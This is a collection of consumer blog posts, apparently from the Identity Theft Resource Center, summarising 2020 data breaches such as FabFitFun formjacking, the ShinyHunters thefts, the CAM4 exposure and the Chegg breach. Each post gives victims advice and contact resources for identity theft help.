Some members of FabFitFun are trying to figure out the next steps for them to take following a FabFitFun data breach. FabFitFun, a company that allows consumers to become members and get customized boxes mailed to them with products, suffered a data breach as the result of formjacking, where a thief inserts a code that gathers credit card information and, in some cases, more personal information in the background while the transaction processes like normal.

According to the Office of the Vermont Attorney General, the FabFitFun technical team discovered illegally placed malicious code on the company’s website. The breach notification letter states the malicious code was placed on the “Shop” portion of the website on May 2 and taken down on May 6. FabFitFun says the data breach did not impact the “Add-Ons” and “Box Purchases” portions of the website.

Members who completed purchases between May 2 and May 6 may have had personal information exposed during the FabFitFun data breach, including names, addresses, cities, states, zip codes, phone numbers, email addresses, credit card numbers, CVV codes and card expiration dates. If members were in the process of checking out but did not complete a purchase between May 2 and May 6, they could have had their names, addresses, cities, states, zip codes, phone numbers and email addresses exposed. Fortunately, those members are not believed to have had any credit card information leaked.

After learning of the malicious code, FabFitFun took down the code and offered affected members an annual membership. Anyone who’s information was exposed in the FabFitFun data breach should contact their credit card or debit card provider and follow their recommendations. Members should monitor their credit card or debit card statements for any suspicious activity and report anything suspicious to the bank listed on the card. For fraudulent charges, members should file an ID Theft Report with the Federal Trade Commission and obtain a copy for their records in case it needs to be used with a creditor to clear fraudulent charges.

Members affected by the FabFitFun data breach can also live-chat with an Identity Theft Resource Center expert advisor, or call toll-free at 888.400.5530. They can also download the free ID Theft Help App, where they can create a customized log to track all their steps in resolving their data breach case, access ITRC advisors for a personalized action plan, resources and much more.


You might also like…

Arbonne Data Exposure Compromises Thousands of Accounts

Consumers Should Watch Out for COVID-19 Job Reopening Scams

ShinyHunters Hacks Expose Business Vulnerabilities

Arbonne International, LLC, a worldwide skin care and health product company that operates as a multi-level marketing business model, announced that it had discovered a data compromise of its computer system. After noticing some unusual, unauthorized activity on its network, Arbonne hired a third-party security company to investigate the scope of the Arbonne data exposure.

While their findings are still incomplete, they did discover that an unknown entity gained access to certain aspects of the computerized system. No highly-sensitive information like Social Security numbers was compromised and no payment card information was accessed. However, to be safe, Arbonne forced a password reset of its affected users’ accounts and filed a notification with the proper authorities. The company also issued data breach event notification letters for the Arbonne data exposure and is offering one year of identity monitoring to affected users in compliance with state laws.

While Arbonne continues to sort out how the data exposure happened and what the extent of the compromise may be, it serves as an important reminder to all tech users about the need for good passphrase practices. The passwords of old may not be secure enough anymore and experts recommend a longer “passphrase” that is difficult for malicious actors to guess but easier for the individual user to remember. By establishing passphrases, users may be more likely to make new ones for every account instead of reusing them or changing them by only one letter or digit when a situation like the Arbonne data exposure arises.

Arbonne account holders should monitor their other accounts carefully for the foreseeable future to keep a close watch for any suspicious activity. If they see suspicious activity, they should contact their bank immediately. Victims of the Arbonne data exposure can also live-chat with an Identity Theft Resource Center advisor or call the ITRC toll-free at 888.400.5530. Victims can also download the free ID Theft Help App for iOS or Android, which allows victims to track their steps in a case management tool, live-chat with an advisor, access resources and much more.


You might also like…

Consumers Should Watch Out for COVID-19 Reopening Job Scams

ShinyHunters Hacks Expose Business Vulnerabilities

College Student Stimulus Check Scams Begin to Heat Up

Since 2005, the Identity Theft Resource Center (ITRC) has been tracking publicly notified breaches, building one of the most comprehensive repositories of data in the U.S. that is updated daily.

One of the most recent cybercrimes the ITRC reported involves a cybercrime ring, ShinyHunters, stealing the information of over 200 million customers from at least 13 different companies. In early May, ShinyHunters posted 15 million customer records on the dark web. Two days later, the hacking group began offering the entire database to buyers, which included 91 million user accounts from an Indonesian website.

Since then, ShinyHunters has offered more than 100 million users’ account information at popular websites like dating app Zoosk, meal kit company Home Chef, design-focused marketplace Minted, Minnesota’s Star Tribune newspaper, health and wellness website Mindful, photo printing service Chatbooks and online publication Chronicle of Higher Education.

While not all of those companies acknowledged ShinyHunters’ claims, more are recognizing the data breaches once they confirm there was data theft. One of the latest companies to confirm a data breach was Mathway, a popular education app for iPhone and Android devices. It is believed that the information stolen includes data about children who are the primary users of the app. The Mathway data has proven to be worth a lot on the dark web, going for $4,000 in bitcoin (or over $375 million U.S.) for 25 million stolen user accounts.

ShinyHunters has acknowledged its successful hacks. In fact, in an interview with WIRED magazine, a spokes-hacker said “it is not too hard” to breach so many organizations. They continued to say that “it’s just a way to make money.”

Groups that commit wholesale data theft are not amateurs like one might see in a TV show or a movie. These groups are professional threat actors that run their groups like any business. They have advertising campaigns, marketing campaigns, help desks and customer support – all to steal people’s information and convert it into cash.

Two other recent data breaches the ITRC has noted were of PaperlessPay, a third-party provider for personal information like W-2’s and paystubs, and Wishbone, a social media app that lets users compare products and then interact with other app users to find out what products are hot and what are not.

In February, federal law enforcement investigators found identity thieves selling PaperlessPay client data. The personal information compromised included the names, addresses, pay and withholdings, Social Security numbers and bank account numbers, in some cases.

In regards to Wishbone, hackers are selling 40 million account profiles, which includes names, email addresses, phone numbers, locations, genders, social media profiles and hashed accounts passwords of users. While hashed passwords are typically useless because the information is encrypted and has to be unlocked, Wishbone uses an outdated form of encryption that is easily cracked with a password breaking tool. This is the most recent breach for Wishbone that was also successfully attacked in 2017.

Businesses must keep their cybersecurity and data protection up-to-date. If not, it can lead to data breaches and a loss of revenue from customers who might not trust the business with their personal information. It is also important for consumers to make sure their apps, websites and businesses they share data with have strong security to protect their information. Consumers are encouraged to ask questions before sharing personal information so they can take their business to a company that takes data protection and privacy seriously.

If someone believes they have had their information exposed as part of a data breach, or is a victim of identity theft due to a data breach, they can live-chat with an ITRC expert advisor. They can also call toll-free at 888.400.5530. Advisors can help victims create action plans that are tailored to them. Victims can also download the ID Theft Help App. The app lets them track their case in a case log, access resources and tips to help them protect their identity and more.

Join us on our weekly data breach podcast to get the latest perspectives on the last week in breaches. Subscribe to get it delivered on your preferred podcast platform.


Contact Tracing Scams Ramp Up as New Technology Evolves Amid COVID-19 Pandemic

Possible Nigerian Fraud Ring to Blame for Unemployment Identity Theft Attack

Since 2005, the Identity Theft Resource Center has compiled publicly-reported U.S. data breaches as part of our data breach tracking efforts. While our 2019 Data Breach Report revealed an annual 17 percent increase in data breaches compared to 2018, there has since been a data breach decrease reported during the first quarter of 2020, both in the number of incidents and individuals impacted.

In the first quarter of 2020, there were 337 publicly reported breaches and exposures. During the same time period in 2019, 520 data events were reported, which means there have been nearly 185 fewer breaches/exposures reported in 2020. In terms of people impacted, 131 million individuals were affected from January through March of 2020. While that might sound like a lot, 442 million people had their data compromised during that same timeframe in 2019. Overall, the number of data compromises decreased by nearly 35 percent, and the number of people affected by 66 percent in the first three months of 2020. Any decrease in data compromises is a good thing, but it’s important to understand what’s behind the numbers dropping due to the data breach decrease.

The ITRC tracks both publicly reported data breaches and data exposures in a database containing 25 different information fields and 63 different identity attributes that are updated daily. While the ITRC has one of the most comprehensive repositories of data compromises, not all incidents are publicly reported; there can be significant delays between when a breach occurs and is publicly reported. The result of these factors can produce a reduction of publicly reported data events.

There are other reasons why the ITRC’s data could be different from other data breach reports – especially those that are reporting an increase in data compromises in Q1 2020. For example, the ITRC reports the number of records compromised based on the number of individuals impacted, not the number of records stolen or exposed. We believe this methodology gives a more accurate view of the human impact of a data breach or exposure since a single person may have multiple records involved in a single event.

The COVID-19 pandemic could have also played a role in the data breach decrease (particularly in March) as threat actors turned their attention to using the data they already had to launch phishing attacks and COVID-19 scams rather than launching new mass cyberattacks. However, there is no substantive proof of why there was such a drastic decline in the first quarter numbers. With that said, the ITRC believes data breaches could return to a more traditional trendline later in 2020.

If someone believes they have had their information exposed as part of a data breach, or is a victim of identity theft due to a data breach, they can live-chat with an ITRC expert advisor. They can also call toll-free at 888.400.5530. Advisors can help victims create action plans that are tailored to them. Victims can also download the ID Theft Help App. The app lets them track their case in a case log, access resources and tips to help them protect their identity and more.

Join us on our weekly data breach podcast to get the latest perspectives on the last week in breaches. Subscribe to get it delivered on your preferred podcast platform.


You might also like…

Contact Tracing Scams Ramp Up as New Technology Evolves Amid COVID-19 Pandemic

Possible Nigerian Fraud Ring to Blame for Unemployment Identity Theft Attack

Five State Unemployment Department Data Exposures Uncover System Flaws

This blog will be updated as more information becomes available

Reports of accidental exposures and data leaks from six different states’ unemployment websites have some consumers concerned. Illinois, Arkansas, Colorado, Ohio, Florida, and most recently, Kentucky have all suffered recent unemployment department data exposures due to their quick response in setting up convenient, DIY websites for those seeking unemployment benefits due to closures from the coronavirus.

Pandemic Unemployment Assistance, or PUA, offers federal assistance to those who are affected by the quarantine. The PUA can be especially helpful as self-employed people, independent contractors and other “gig economy” workers can receive assistance during this time.

In an effort to expedite the submission and processing of these applications, many states have relied on outside vendors to establish their PUA application web portals. Unfortunately, in the rush to help consumers, some of those websites launched before they could be thoroughly quality tested and reviewed for security. The multiple unemployment department data exposures left tens of thousands of users’ complete identities exposed, leading to even more cause for concern.

In each of the six states, the PUA application sites were taken down until they could be secured. Two states, Colorado and Ohio, were notified by Deloitte, their vendor, as to the exposure. One state is already offering credit monitoring to all 72,000 of its PUA recipients, while the others are still investigating and could offer support as their findings unfold.

Also, due to the difficulties surrounding quarantine and employment at this time, the Identity Theft Resource Center has seen cases where workers received notifications that their unemployment application was approved, even though they had not applied for assistance or were still working. However, there is no known link between those cases and the current issues with the Pandemic Unemployment Assistance sites.

All consumers should remain aware of the threat, regardless of their current employment status. If anyone suspects that their personally identifiable information has been exposed or compromised, they are encouraged to place a freeze on their credit reports with the three major credit reporting agencies. They are also encouraged to use anti-virus solutions to secure their devices and protect their online accounts, update their old passwords to a stronger passphrase and make sure none of those passphrases on their personal accounts are also used on their work accounts.

Anyone who has questions or believes they have been affected by an unemployment department data exposure is urged to live-chat with an Identity Theft Resource Center expert advisor. Victims can also call the ITRC toll-free at 888.400.5530. Another tool for victims of a data breach or data exposure is the ID Theft Help App. The app can serve as a “breach activity” case manager for those impacted.


You might also like…

Online Shopping Safety a Priority During Coronavirus Pandemic

The Evolution of Password Advice

COVID-19 Could Lead to Increase in Travel Loyalty Account Takeover

Fourteen million Key Ring customers, mostly across North America, may have had their personally identifiable information exposed in a Key Ring data leak that affected the company’s Amazon S3 web storage buckets. The buckets can hold vast databases of information. However, they are not configured as fully secured by default when they are created. Rather, it is the client’s (in this case Key Ring) responsibility to secure their storage buckets.

The Key Ring data leak was discovered in January 2020 by security researchers, Noam Rotem and Ran Locar, from vpnMentor who reached out to both Amazon Web Services and Key Ring with their findings. They confirmed that the databases were secured sometime after February 18 when they first contacted the company.

The purpose of Key Ring, a digital storage app that holds uploaded images of its customers’ loyalty and gift cards, is to make shopping and mobile payments more streamlined by storing images of users’ customer loyalty account cards and gift cards. While Key Ring is not intended to be used to store more sensitive information like driver’s licenses, ID cards and other types of payment cards, some users have used it to save images of these sensitive documents. Affected users’ uploaded card images were unprotected in the Key Ring storage buckets, leading to the accidental Key Ring data leak.

There is no way of knowing whether this information was accessed by malicious actors; the data was discovered by researchers who uncover these unsecured databases to inform the owners. However, if hackers were able to get a hold of the information that was leaked, they could target the customers with spam or phishing attempts, takeover the customers’ accounts, potentially use their payment methods for online shopping and more. Any customer who feels their data may have been compromised from the Key Ring data leak can contact Key Ring for more information about what protection is being offered. Those potentially affected should immediately change the passwords on their loyalty accounts, as well as monitor their bank accounts to look for any suspicious transactions, consider credit monitoring services and a credit freeze, and be on the lookout for phishing emails.

If anyone who believes they have been affected by the Key Ring data leak, they can live-chat with an Identity Theft Resource Center expert advisor or call them toll-free at 888.400.5530. They can also download the ID Theft Help App, which allows victims to track their steps in a customized case log.


You might also like…

Online Shopping Safety a Priority During Coronavirus Pandemic

The Evolution of Password Advice

COVID-19 Could Lead to Increase in Travel Loyalty Account Takeover

From groceries and household goods to medicine and clothes, the coronavirus pandemic has forced people to do a fair bit of their shopping online. According to data from ACI Worldwide, in March 2020, online retail shopping saw a rise in sales as high 74 percent year over year. While online shopping is playing an important role in allowing people to stay home and safely shop during COVID-19, hackers are taking note as well. That could be part of the reason why retail and manufacturing companies are seeing the most attacks. It is also why it is so important for consumers to exercise online shopping safety to not expose their personally identifiable information (PII) unwittingly.

Online shopping has grown in popularity and ease of use over the years. The increase of its use due to COVID-19 could lead to a heightened risk of formjacking, when cybercriminals insert malicious code to an existing, reputable website and gain access to its sensitive user information. While shopping the site, the user data is sent to hackers even as the user’s cart is processing as it should with the retailer. According to CNBC, e-skimming attacks intended to steal people’s personal information while shopping online were already increasing before COVID-19. Online shopping amid the pandemic has also led to an increase in fake goods being sold online, like fake cures, vaccines and tests.

Fraudsters understand the consumers’ needs to buy essential and nonessential goods during COVID-19 and are taking advantage. Tenable Research identified an SMS spoofing flaw that could have allowed an attacker to send spoofed messages to any mobile number. While the flaw was patched, hackers could have exploited it with malicious links.

Despite some of the risks of shopping online, there are things consumers can do to practice online shopping safety. People should make sure all of their transactions are at legitimate business websites that they visit directly. If someone comes across any fake products, they should report it to the National IPR Center or the Consumer Product Safety Commission. Finally, when creating an account to shop online, consumers should exercise online shopping safety by using strong security questions and answers.

To reduce the likelihood of falling victim to a phishing attempt while trying to shop online, consumers should protect their computers and devices by using security software, multi-factor authentication and backing up their data. These tips could help reduce the likelihood of a consumer falling for a scam or victim of identity theft. If someone believes they are a victim of identity theft or has any questions regarding online shopping safety, they can live-chat with an Identity Theft Resource Center expert advisor. They can also call toll-free at 888.400.5530.


You might also like…

COVID-19 COULD LEAD TO INCREASE IN TRAVEL LOYALTY ACCOUNT TAKEOVER

COVID-19 CATFISHING SCAMS MAKE A REBOUND AMID PANDEMIC

CAM4 DATA EXPOSURE LEAKS BILLIONS OF RECORDS FROM ADULT STREAMING WEBSITE

A recent CAM4 data exposure left nearly 11 billion records exposed. A team of researchers uncovered the leak by CAM4, an adult streaming website. According to komando.com, it is estimated that just over 6.5 million of those records were from users in the U.S. The information leaked in the CAM4 data exposure included full names, email addresses and payment logs. The database was immediately taken down by parent company Granity Entertainment once the CAM4 data exposure was discovered. However, the logs appear to have been exposed since March 16.

According to the researchers in an article published by Security Boulevard, a large amount of email content came from popular domains like Gmail, Hotmail and iCloud, domains that offer supplementary services like cloud-storage and business tools. That could mean that compromised CAM4 users might see large volumes of personal data (photographs, videos and related business information) leaked to hackers.

CAM4 is not the only adult website to have a large amount of user information exposed or breached. In August 2015, Ashley Madison, a “hookup” website, had its website infiltrated by hackers, who stole 37 million account holders’ names and then released them online. 

If fraudsters get a hold of the CAM4 user information, they could send sextortion scams, emails that claim to have inappropriate videos or pictures of the users, with threats to leak it if a ransom is not paid. If anyone affected by the CAM4 data exposure receives a similar email, it is probably a scam and should be ignored.

While those affected by the CAM4 data exposure are at an increased risk of receiving sextortion scams, it is not just important that the emails are ignored; it is equally important for people not to click any links, open any attachments or download any files associated with the email. Victims should also change the password to their account and the password of any other accounts that might share the same password. If anyone believes they have been affected by the CAM4 data exposure, they can live-chat with an Identity Theft Resource Center expert advisor. They can also call toll-free at 888.400.5530. Advisors can help potential victims created an action plan that is personalized to them.


You might also like…

THIRD CHEGG DATA BREACH IN THREE YEARS IMPACTS NEARLY 700 EMPLOYEES

BILL & MELINDA GATES FOUNDATION, CDC, NIH AND WHO EMPLOYEE INFORMATION EXPOSED

CREDENTIAL STUFFING COMPROMISES 160,000 ACCOUNTS IN NINTENDO DATA BREACH

Multi-billion dollar education tech company Chegg—which specializes in digital and print textbook rentals, as well as online homework help solutions—announced it suffered another data breach. This Chegg data breach impacted approximately 700 of its employees. It marked the third data breach of Chegg or its acquisitions since 2018.

Unlike the 2018 Chegg data breach, which compromised the account records of an estimated 40 million users, this breach affected current and former employees. Those employees’ personally identifiable information is believed to have been stolen, including their names and Social Security numbers. Another data breach was disclosed in 2019, days after Chegg acquired another platform, Thinkful.

There’s been speculation that sites like Chegg could become more of a target for hackers now that so many educational institutions are closed due to COVID-19. Having transferred their learning to internet-based distance learning options, students and professors alike have been taking greater advantage of online homework and test prep help. The increase in traffic could lead hackers to go after these companies to steal identities or payment methods. However, there is no proof that Chegg has become more of a target or that the latest Chegg data breach is due to schools being closed.

Chegg notified the affected employees of the recent breach, and under California law, the employees are entitled to some protective measures. Anyone who has had their information compromised in any type of data breach should consider requesting a no-cost freeze on their credit reports from the three major credit reporting agencies—Equifax, Experian and TransUnion. While it may take a few more steps when a consumer is looking to apply for credit, a freeze is one of the most robust preventative measures a person can implement to safeguard their identity credentials. Also, consumers who are concerned about the security of their personally identifiable information can look for credit monitoring and identity theft solutions that will keep them informed if anyone uses their data.

Victims of the Chegg data breach should also file their tax returns as soon as possible. With the delay in the filing deadline due to disruption caused by COVID-19, a significant number of taxpayers could choose to put off filing until things are more stable and they can safely visit a tax preparer. While it is one less thing to worry about right now, it is also a longer timeframe for identity thieves to file a fraudulent tax return in someone else’s name.

Anyone who thinks they are a victim of the Chegg data breach can live chat with an Identity Theft Resource Center expert advisor. They can also call toll-free at 888.400.5530.


BILL & MELINDA GATES FOUNDATION, CDC, NIH AND WHO EMPLOYEE INFORMATION EXPOSED

CREDENTIAL STUFFING COMPROMISES 160,000 ACCOUNTS IN NINTENDO DATA BREACH

PAAY DATA EXPOSURE LEAVES DATABASE WITH CREDIT CARD DETAILS AND TRANSACTIONS UNSECURED

Nearly 25,000 public health organization employees had their email addresses and passwords exposed after they were dumped online. According to the SITE Intelligence Group, a U.S. – based hacker activist is the likely source of the Bill & Melinda Gates Foundation, Center for Disease Control and Prevention (CDC), National Institute of Health (NIH) and World Health Organization (WHO) employee information being exposed. CNET reported that the email addresses and passwords appear to have come from data that was breached and first posted on the internet in 2016. According to the Washington Post, the hacker was encouraging people to go into the emails of the respected agencies to “uncover” what was happening at the organizations in regards to COVID-19.

The leaked data was reported in April and is believed to have come from a larger set of breached information. Fortunately, the leaked password information only affected one system at WHO, an older extranet system. WHO has reported an increase in attempted hacks and has seen an increase in fraudulent emails sent by hackers posing as WHO employees. However, WHO has also reported that the increase in attacks has not been due to this data leak, particularly because old WHO employee information was exposed.

WHO said the following in a statement: “Ensuring the security of health information for Member States and the privacy of users interacting with us is a priority for WHO at all times, but also particularly during the COVID-19 pandemic. We are all in this fight together.”

The Gates Foundation reported that they do not currently have an indication of a data breach at their foundation. However, employees at the affected organizations should change their passwords and the passwords of any other accounts that have the same credentials. The WHO employee information being exposed is another reminder of the importance of using strong, unique passwords, and never using the same password across multiple accounts.

If someone believes they had their WHO or other organization’s employee information exposed, or is a victim of identity theft, they can live chat with an Identity Theft Resource Center expert advisor. They can also call toll-free at 888.400.5530. Advisors will help people create an action plan that is personalized to their set of circumstances.


You might also like…

CREDENTIAL STUFFING COMPROMISES 160,000 ACCOUNTS IN NINTENDO DATA BREACH

PAAY DATA EXPOSURE LEAVES DATABASE WITH CREDIT CARD DETAILS AND TRANSACTIONS UNSECURED

POPULAR VIRTUAL PET PLATFORM WEBKINZ BREACHED BY BAD ACTOR